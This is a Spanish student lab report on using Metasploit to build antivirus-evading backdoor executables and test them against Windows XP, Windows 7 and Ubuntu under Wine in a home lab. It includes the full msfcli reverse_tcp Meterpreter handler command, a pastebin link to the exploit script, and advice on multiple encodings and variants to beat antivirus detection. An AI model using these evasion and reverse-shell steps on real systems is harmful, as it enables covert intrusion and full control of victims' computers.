Explora Libros electrónicos
Categorías
Explora Audiolibros
Categorías
Explora Revistas
Categorías
Explora Documentos
Categorías
METASPLOIT
PRACTICA 4 MALWARE INDETECTABLE CONTRA ANTIVIRUS Y SISTEMAS
INTRODUCCION
EQUIPOS DE PRUEBAS
SEGUNDO DE ASIR
Pgina 1
INTRODUCCION
QUE ES UN ANTIVIRUS?
Es un programa creado para prevenir o evitar la activacin de los virus, as como su propagacin y contagio. Cuenta adems con rutinas de detencin, eliminacin y reconstruccin de los archivos y las reas infectadas del sistema. Un antivirus tiene tres principales funciones y componentes:
VACUNA es un programa que instalado residente en la memoria, acta como "filtro" de los programas que son ejecutados, abiertos para ser ledos o copiados, en tiempo real. DETECTOR, que es el programa que examina todos los archivos existentes en el disco o a los que se les indique en una determinada ruta o PATH. Tiene instrucciones de control y reconocimiento exacto de los cdigos virales que permiten capturar sus pares, debidamente registrados y en forma sumamente rpida desarman su estructura. ELIMINADOR es el programa que una vez desactivada la estructura del virus procede a eliminarlo e inmediatamente despus a reparar o reconstruir los archivos y reas afectadas.
Es importante aclarar que todo antivirus es un programa y que, como todo programa, slo funcionar correctamente si es adecuado y est bien configurado. Adems, un antivirus es una herramienta para el usuario y no slo no ser eficaz para el 100% de los casos, sino que nunca ser una proteccin total ni definitiva.
SEGUNDO DE ASIR
Pgina 2
EQUIPOS DE PRUEBAS
EQUIPO VICTIMA WINDOWS XP SP2
La direccin IP de nuestro equipo victima1 ser la que vemos en la imagen 192.168.1.35
ESET NOD32 AntiVirus es un antivirus de calidad y eficacia realmente impresionantes, con una certeza prcticamente absoluta de que en cada una de sus versiones detectar cualquier virus conocido y, mediante una heurstica compleja, por conocer. En conjunto ESET NOD32 AntiVirus es un antivirus de primera calidad, compitiendo entre los mejores en la mayora de las facetas de estos indispensables de los usuarios, aunque en la velocidad y la total deteccin basa toda su potencia, destacando del resto. Esta versin de ESET NOD32 AntiVirus se adapta a las ltimas tendencias en lo que a interfaz grfica se refiere. La nueva interfaz, aunque en ingls, es fcil de usar a ms no poder, y cuenta con dos modos: normal y avanzado.
Heurstica avanzada Anlisis muy rpidos Consumo de memoria reducido Proteccin mediante contrasea Exportacin de la configuracin Inspector de sistema y actividad Pgina 3
SEGUNDO DE ASIR
PROTECCION AVAST 6.0.1367 ACTUALIZADO 29/01/2012 Las novedades de la versin 6 La sexta edicin de avast! Free Antivirus presenta pocos cambios estticos en comparacin con la anterior, pero ampla an ms el abanico de la proteccin gratuita. A los escudos de la versin 5 se aaden los de scripts y comportamiento. Y con el mdulo AutoSandbox, avast! Free Antivirus impide que programas potencialmente dainos puedan afectar el sistema.La gran novedad de avast! Free Antivirus 6 es WebRep, el complemento para Firefox, Chrome e Internet Explorer que comprueba la reputacin de una pgina a partir de las valoraciones de los usuarios. Tres barras coloreadas indican la calidad del sitio y hay recuadros para clasificar el sitio web en distintas categoras. Es un sistema eficaz y abierto a las contribuciones de los usuarios. Lo cierto es que ningn antivirus gratuito ofrece tanto como avast! Free Antivirus. Traducido y apoyado por una inmensa comunidad de usuarios, se postula como el antivirus gratuito por excelencia.
Ocho escudos de proteccin en tiempo real Defensa proactiva con el escudo conductual Sandbox para ejecutar software sospechoso Mdulo de reputacin web Pgina 4
SEGUNDO DE ASIR
IObit Malware Fighter protege el ordenador frente a programas espa, troyanos, adware y otros tipos de software maligno que suele atacar el sistema a travs de pginas web, correos y descargas. La tarjeta de presentacin de IObit Malware Fighter es impecable: una ventana elegante, un consumo de memoria contenido y ocho escudos de proteccin en tiempo real. Por si no bastara, IObit ha aadido DOG, una nariz electrnica capaz de encontrar malware desconocido a partir de varios criterios. Es todo oro lo que reluce? En nuestras pruebas, IObit Malware Fighter ha sido eficaz y rpido, detectando amenazas al instante y guardando los archivos en cuarentena; a veces, en las redes de IObit Malware Fighter ha cado incluso publicidad normal y corriente. Si te quedaran dudas acerca de la peligrosidad de un archivo, IObit Malware Fighter puede subirlo a IObit Cloud, su servicio de anlisis "en la Nube". Es un buen aadido para este antiespas eficaz y ligero.
Proteccin en tiempo real rpida y eficaz Deteccin de amenazas desconocidas Envo de archivos sospechosos a IObit Cloud Excelente diseo de interfaz
SEGUNDO DE ASIR
Pgina 5
Kaspersky Internet Security 2012 brinda una proteccin superior contra virus, troyanos, spam, hackers y otros. Su foco en la seguridad digital, que incluye sistemas hbridos de ltima generacin, combina innovadoras tecnologas en la nube con una avanzada proteccin antivirus para garantizar una respuesta ms rpida y efectiva contra las amenazas modernas que siempre estn en constante desarrollo. T, al igual que tus datos privados y tu PC, estn bajo completa proteccin cuando trabajas, realizas transacciones bancarias, compras online o juegas en Internet.
SEGUNDO DE ASIR
Pgina 6
ESET NOD32 AntiVirus es un antivirus de calidad y eficacia realmente impresionantes, con una certeza prcticamente absoluta de que en cada una de sus versiones detectar cualquier virus conocido y, mediante una heurstica compleja, por conocer. En conjunto ESET NOD32 AntiVirus es un antivirus de primera calidad, compitiendo entre los mejores en la mayora de las facetas de estos indispensables de los usuarios, aunque en la velocidad y la total deteccin basa toda su potencia, destacando del resto. Esta versin de ESET NOD32 AntiVirus se adapta a las ltimas tendencias en lo que a interfaz grfica se refiere. La nueva interfaz, aunque en ingls, es fcil de usar a ms no poder, y cuenta con dos modos: normal y avanzado.
Heurstica avanzada Anlisis muy rpidos Consumo de memoria reducido Proteccin mediante contrasea Exportacin de la configuracin Inspector de sistema y actividad Pgina 7
SEGUNDO DE ASIR
SEGUNDO DE ASIR
Pgina 8
CDIGO EXPLOIT
Lo podemos descargar desde el siguiente enlace http://pastebin.com/7xmvGnks
Hay que tener en cuenta que si lo dejamos tal como esta nos dar el siguiente error y el archivo ejecutable que nos de. No servir para nada
SEGUNDO DE ASIR
Pgina 9
As nos quedara despus de hacer el cambio pertinente para que funcione el script, es decir, haciendo que el script lea la direccin IP cuando la introducimos, La asigne el valor correcto a la variable y no tengamos ningn problema.
SEGUNDO DE ASIR
Pgina 10
SEGUNDO DE ASIR
Pgina 12
PROCESO DE COMPILACIN
Veremos, que cuando lo estamos creando y se est codificando nuestro ordenador puede tardar un poco en responder, esto es porque para realizar este proceso, el uso de la CPU llegar al 100% y se mantendr hasta que termine la operacin.
Como vemos se llevaran acabo las codificaciones indicadas y se ejecutara una vez creado automticamente.
Una vez terminada la aplicacin veremos que se abre automticamente una el payload con la direccin IP de nuestro ordenador y el puerto donde est escuchando.
SEGUNDO DE ASIR
Pgina 13
SEGUNDO DE ASIR
Pgina 14
Vemos como cambiando los valores tanto de inicializacin como de tamao el hash del virus, cambia lo suficiente como para ser detectado por muchos menos
Cambiando un poco el cdigo y volvindolo un poco ms sencillo volvemos a mejorar los resultados.
SEGUNDO DE ASIR
Pgina 15
SEGUNDO DE ASIR
Pgina 16
Entonces ahora lo que hacemos es ejecutar el archivo malicioso, que para ms INRI, tiene el nombre de Backdoor.exe una vez ejecutado el archivo.
Vemos como hemos creado sesin en el equipo de la vctima, recordemos que este tiene WINDOWS XP SP2 y el antivirus, completamente actualizado.
SEGUNDO DE ASIR
Pgina 17
SEGUNDO DE ASIR
Pgina 18
Probamos con el Anti Malware instalado en el equipo y vemos que tambin nos dice que no tiene ninguna amenaza.
SEGUNDO DE ASIR
Pgina 19
Ejecutamos el archivo y como podemos ver hacemos una captura de pantalla en la que podemos ver el equipo vctima y lo que esta haciendo en ese momento, lo realmente importante no es esta captura de pantalla, sino que tendremos acceso total al ordenador.
SEGUNDO DE ASIR
Pgina 20
Como vemos hemos podido completamente con los dos Windows XP y los resultados que nos ha arrojado el EXPLOIT analizndolo con VIRUSTOTAL son muy buenos.Lo que vamos a hacer ahora es proceder con un sistema operativo WINDOWS7 con Service Pack1 instalado y actualizado a 20-01-2012. Volvemos a ejecutar el comando para que se cargue nuestro payload handler msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.39 LPORT=3222 E y se quede esperando la conexin, hasta que claro, alguien ejecute nuestro archivo, en este caso ese alguien voy a ser yo desde mi equipo anfitrin. Vemos que al introducirnos en el USB donde tenemos el archivo con el MALWARE no nos dice nada el antivirus, entonces lo que vamos a hacer es doble click
SEGUNDO DE ASIR
Pgina 21
SEGUNDO DE ASIR
Pgina 22
Una vez guardados los cambios procedemos de nuevo a su compilacin vista anteriormente en este trabajo. Pulsa aqu para volver a revisar como llevar a cabo dicho proceso. Una vez compilado podemos ver que resultados obtenemos en virus total, aunque en realidad para esta prueba no tiene demasiada importancia, Pues nuestro Ubuntu no tiene ningn antivirus instalado.
Para ver el informe completo de deteccin pinchar sobre el siguiente enlace https://www.virustotal.com/file/b04588b64c7fc06cbf38898e6cc9e065e09d01d7d997ad59ec a25a2b2669ace8/analysis/1328463333/
SEGUNDO DE ASIR
Pgina 23
Veremos algo como la siguiente imagen, esperando a que el archivo malicioso sea ejecutado
Vamos a sus propiedades y marcamos la opcin que vemos en la pantalla para que nos permita ejecutar el archivo con un doble click
SEGUNDO DE ASIR
Pgina 24
Una vez hemos tomado el control, podemos hacer lo que queramos en la vctima, aqu hemos listado todos los archivos de la raz de dicho sistema.
SEGUNDO DE ASIR
Pgina 25
Despus de ejecutar el anterior comando y de que nuestro programa se cree con la cantidad de codificaciones que le hemos metido (las cuales tardarn un rato) lo subimos como ya seguro os lo habis aprendido a virustotal. Y vemos que los resultados que nos arroja, si bien, no son perfectos. No son nada malos partiendo de la base de que de esos 10 motores de bsqueda pertenecen a Antivirus poco conocidos y que los grandes como McAfee, Karpersky, Norton, Avast no los detectan. De todas formas este ejecutable lo podramos guardar y crear otro con el mismo exploit, que no fuera detectado por algunos de estos 10 que lo detectan, y asi con dos o tres ejecutables diferentes utilizando el dado para la ocasin saltarnos cualquier antivirus.
SEGUNDO DE ASIR
Pgina 26
SEGUNDO DE ASIR
Pgina 27
SEGUNDO DE ASIR
Pgina 28
En el mismo proceso de instalacin podemos ver la siguiente ventana en la que tendremos que aceptar los trminos de la licencia.
SEGUNDO DE ASIR
Pgina 29
Lo siguiente que debemos hacer es ejecutar el comando desde la terminal winecfg esperar a que se lleven a cabo una serie de procesos y nos salga la ventana de configuracin donde podremos configurar, como el sistema operativo de Microsoft a emular y diferentes cosas, nosotros lo dejamos como viene por defecto.
ATACANDO UBUNTU MEDIANTE WINE Como nuestro exloit ya esta creado y camuflado en un EXE. Nos metemos en nuestra mquina atacante (backtrack5) y ejecutamos el siguiente comando desde la consola msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.39 LPORT=3222 E
Veremos algo como la siguiente imagen, esperando a que el archivo malicioso sea ejecutado
SEGUNDO DE ASIR
Pgina 30
Como podemos ver, la sesin se crea perfectamente y si hacemos un SYSINFO nos dice que esta corriendo un Windows XP SP3 Pues es el sistema operativo al que esta emulando Wine
Tambin podemos hacer un ls para mirar los archivos de la raz y como vemos tenemos control completo de Linux.
SEGUNDO DE ASIR
Pgina 31
SEGUNDO DE ASIR
Pgina 32
CONCLUSIONES
Las actualizaciones de Sistemas operativos y todo tipo de software como los antivirus son muy importantes. MANTENTE ACTUALIZADO. Ninguna proteccin es definitiva, pero si se mejora algo nuestra seguridad. Nunca debemos dar informacin del software instalado en nuestro equipo (sobretodo antivirus) Linux tambin es vulnerable y debido a que mucha gente piensa que no lo es, no tienen software antivirus en su distribucin (GRAN ERROR)
REFERENCIAS (WEBGRAFA)
http://www.flu-project.com/backdoor-indetectable-generado-con-metasploit.html
http://thehackerway.com/2011/04/07/payloads-metasploit-framework/
http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
http://www.offensive-security.com/metasploit-unleashed/Antivirus_Bypass
http://vishnuvalentino.com/computer/hacking-windows-xp-sp3-via-ms11-006-windowsshell-graphvulnerability/
SEGUNDO DE ASIR
Pgina 33